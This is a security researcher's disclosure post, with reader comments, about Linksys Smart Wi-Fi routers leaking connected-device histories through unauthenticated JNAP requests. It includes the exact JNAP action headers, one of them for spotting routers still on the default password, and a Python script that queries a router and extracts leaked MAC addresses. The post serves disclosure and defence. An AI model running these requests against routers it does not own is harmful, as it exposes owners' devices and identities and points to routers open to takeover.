Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw

Our honeypots frequently detect scans targeting various home automation protocol endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we’ve discovered a persistent flaw affecting Linksys Smart Wi-Fi routers that allows unauthenticated remote access to sensitive information.

How can the vulnerability be exploited?

    1. Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
    2. Open the developer console (F12 key) and go to the Network tab
    3. Scroll down to JNAP (there are multiple entries) and click to open it
Example vulnerable Linksys Smart Wi-Fi EA7500 (AC1900) router

The leak can also be reproduced by sending a request to this JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/devicelist/GetDevices

This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.
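A self-check for the leak described above, added here as an example (it is not code from the original post): it sends the single unauthenticated GetDevices request to a router address and classifies the reply, so an administrator can confirm whether a given router exposes its device list. Assumptions not stated on the page: the JNAP endpoint path is /JNAP/, the request body is an empty JSON object, and a protected action answers with a result other than "OK"; the sample reply is constructed, and the action can be swapped via the `action` parameter for the other JNAP action the post names.

```python
import json
import re
import sys
import urllib.request

JNAP_PATH = "/JNAP/"  # assumed endpoint path; the post names only the action header
GET_DEVICES = "http://cisco.com/jnap/devicelist/GetDevices"  # action named in the post
MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$", re.IGNORECASE)
SAMPLE_REPLY = ('{"result":"OK","output":{"devices":[{"friendlyName":"TROY-PC","knownMACAddresses":'
                '["0C:5B:8F:27:9A:64"],"unit":{"operatingSystem":"Windows 7"}}]}}')  # constructed

def build_request(router, action=GET_DEVICES):
    """Unauthenticated JNAP call as the post describes: one header, empty JSON body."""
    return urllib.request.Request(
        f"http://{router}{JNAP_PATH}",
        data=b"{}",
        headers={"X-JNAP-ACTION": action, "Content-Type": "application/json"},
        method="POST",
    )

def _strings(value):  # yield every string nested anywhere in a decoded JSON document
    if isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)
    elif isinstance(value, str):
        yield value

def assess_leak(body):
    """Return (leaking, leaked MAC set). "result": "OK" means the action ran without
    authentication, which is the flaw; MACs are matched by pattern since no schema is given."""
    try:
        reply = json.loads(body)
    except ValueError:
        return False, set()  # not JNAP at all, e.g. an HTML error page
    if not isinstance(reply, dict) or reply.get("result") != "OK":
        return False, set()  # assumed: a protected action answers with an error result
    return True, {s.lower() for s in _strings(reply.get("output", {})) if MAC_RE.match(s)}

def check_router(router, timeout=5):
    with urllib.request.urlopen(build_request(router), timeout=timeout) as resp:
        return assess_leak(resp.read().decode("utf-8", "replace"))

if __name__ == "__main__":  # usage: python jnap_check.py <router-ip>; without an argument, use the sample
    leaking, macs = check_router(sys.argv[1]) if len(sys.argv) > 1 else assess_leak(SAMPLE_REPLY)
    print("LEAKING" if leaking else "not leaking", f"({len(macs)} MAC addresses exposed)")
```

A reply that parses as JNAP but is not "OK" is reported as not leaking; a connection error means the WAN interface is not answering on port 80 at all, which the script surfaces as an exception rather than a false "not leaking".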

How many Linksys Smart Wi-Fi routers are vulnerable?

Using data provided by BinaryEdge, our scans have found that 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:

    • MAC address of every device that’s ever connected to it (full historical record, not just active devices)
    • Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
    • Operating system (such as “Windows 7” or “Android”)

In some cases, additional metadata such as device type, manufacturer, model number, and description is also leaked, as seen in the example below.

Example metadata leaked by Linksys Smart Wi-Fi routers

Other sensitive information about the router, such as the WAN settings, firewall status, firmware update settings, and DDNS settings, is also leaked publicly.

What are the risks of leaking this information publicly?

A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, share this identifier every time they connect to a wireless network. This creates a fingerprint that can be used to track that device’s movement across networks.

If a device’s name includes the full name of the owner, this flaw allows attackers to determine the identity of the owner and geolocate them via the Linksys Smart Wi-Fi router’s public IP address.

While geolocation by IP address is not precise, services like WiGLE allow anyone to get the exact geographical coordinates of a WiFi network based solely on its MAC address or SSID. An attacker can query the target Linksys Smart Wi-Fi router, get its MAC address, and immediately geolocate it.

In any scenario, publicly leaking the historical record of every device that’s ever connected to the Linksys Smart Wi-Fi router is a privacy concern that shouldn’t be taken lightly. This information allows attackers to gain visibility inside your home or business network, enabling them to conduct targeted attacks.

Is there any connection to the ShadowHammer attacks?

Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks. However, it’s not likely either were targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei. The second was the VMware default (00:50:56:c0:00:08) and was targeted only if it paired with a secondary MAC address.

Did you find the German mail bomber?

The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.

What is Home Network Administration Protocol (HNAP)?

HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years. Large-scale exploitation of HNAP flaws by “TheMoon” botnet was discovered by security researchers in 2014.

Are there other HNAP vulnerabilities?

Yes, an unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers have not changed the default password (admin) without even attempting to log in to the device. This can be done simply by querying the following JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/core/IsAdminPasswordDefault

Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.

Admin access to the Linksys Smart Wi-Fi router allows attackers to:

    • Obtain the SSID and Wi-Fi password in plaintext
    • Change the DNS settings to use a rogue DNS server to hijack web traffic
    • Open ports in the router’s firewall to directly target devices behind the router (example: 3389/tcp for Windows RDP)
    • Use UPnP to redirect outgoing traffic to the threat actors’ device
    • Create an OpenVPN account (supported models) to route malicious traffic through the router
    • Disable the router’s internet connection or modify other settings in a destructive manner

What specific models of Linksys Smart Wi-Fi routers are vulnerable?

Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.

Vulnerable Linksys Smart Wi-Fi router model numbers

The full list of vulnerable models and firmware versions is available here.

Where are the vulnerable routers located?

This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.

Vulnerable Linksys Smart Wi-Fi routers by country
Of the vulnerable routers found, most were located in the United States.

Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the networks of 1,998 unique autonomous systems (internet service providers).

Wasn’t this issue patched five years ago?

While CVE-2014-8244 supposedly patched this issue, our findings indicate otherwise. Upon contacting the Linksys security team (security@linksys.com), we were advised to report the vulnerability via this form. After we submitted our findings, the reviewing analyst determined the issue was “Not applicable / Won’t fix” and subsequently closed the report.

Is there any good news?

Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.

Closing remarks

Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published.

Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.

Follow us on Twitter for the latest emerging threats and botnet trends.

15 thoughts on “Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw”

  1. Are the WRT* models vulnerable if they have been flashed with OpenWRT/LEDE firmware? This could be a workaround for users with those devices, until an official updated firmware is released.

    • Thanks for the suggestion. While it’s not available for all Linksys models impacted, it does offer a great workaround to stop the leak.

  2. So, I just contacted Linksys support, and they simply advised me not to let people I don’t trust connect to my Wi-Fi. However, it sounds like the vulnerability allows the hacker to access the sensitive data remotely. Can anything substantial be done to secure my router without installing OpenWRT firmware? I am afraid of bricking the device. I’ve had a custom admin password on it since the purchase.

    • @Serge: I have today installed OpenWRT on a WRT3200ACM model. Since this model has dual firmware support, when I did so it simply burned it to the alternate block and marked it as the bootable one; the original Linksys firmware is still fully intact in the other block. I quickly discovered that there is an extra package for the LuCI UI, luci-app-advanced-reboot, that can be installed which adds an Advanced Reboot section to System that allows quickly rebooting to either firmware block!

      If you also have a WRT3200ACM or one of the other Linksys models with dual firmware blocks, you might not be able to make a mess of it even if you try.

      • @VulcanTourist, I am using the EA6350. There is only a snapshot release for it, but I guess I can follow the debrick procedure if I mess something up.

  3. Another temporary “workaround” would be to put something more secure between the Linksys router and the internet. Either a pure firewall or some router with firewall capabilities.

  4. I literally just discovered this myself, then ironically Google referred me to this in the news.

  5. I see: “The routers have remote access enabled by default and can’t be turned off as a workaround, because it’s required for an accompanying Linksys App to function.”.

    This doesn’t seem fully accurate because one of the first configuration steps I took when I got my WRT1900ACS was to disable Remote Access under Connectivity->Administration (to see that parameter you have to log in to the router using a Linksys Smart-WiFi account instead of the local access method). I do not use the Linksys app on my phone so I have not noticed any loss of function on the router.

    Does anyone know if disabling Remote Access thwarts the data leak?

  7. Just found out my router is affected. Another workaround is to enable port forwarding from port 80 to a non-existent internal IP/port combination. That way, the public webpage will show a “can’t connect” message, yet the administration site on the internal gateway IP still works.

  8. I recently purchased an EA8300 (refurb), which you list as a model that leaks info, causing me no small amount of concern. So, I ran the bash script against my public IP from within my home network and it reported everything. But, I can’t access the router’s web page from an external network via port 80, 10000, or 10080. I checked my ports using Gibson Research’s ShieldsUP! tool; there are no open ports. I then ran the jnapsiph.sh script from an external network, and it reported nothing.
    If there is truly a leak of information, then it is likely due to security issues on the server side (the Linksys/Cisco JNAP URLs), and/or with the Android app, not the router itself. Perhaps it shows up if you download the app and use it to access your router remotely? I’m not testing that…
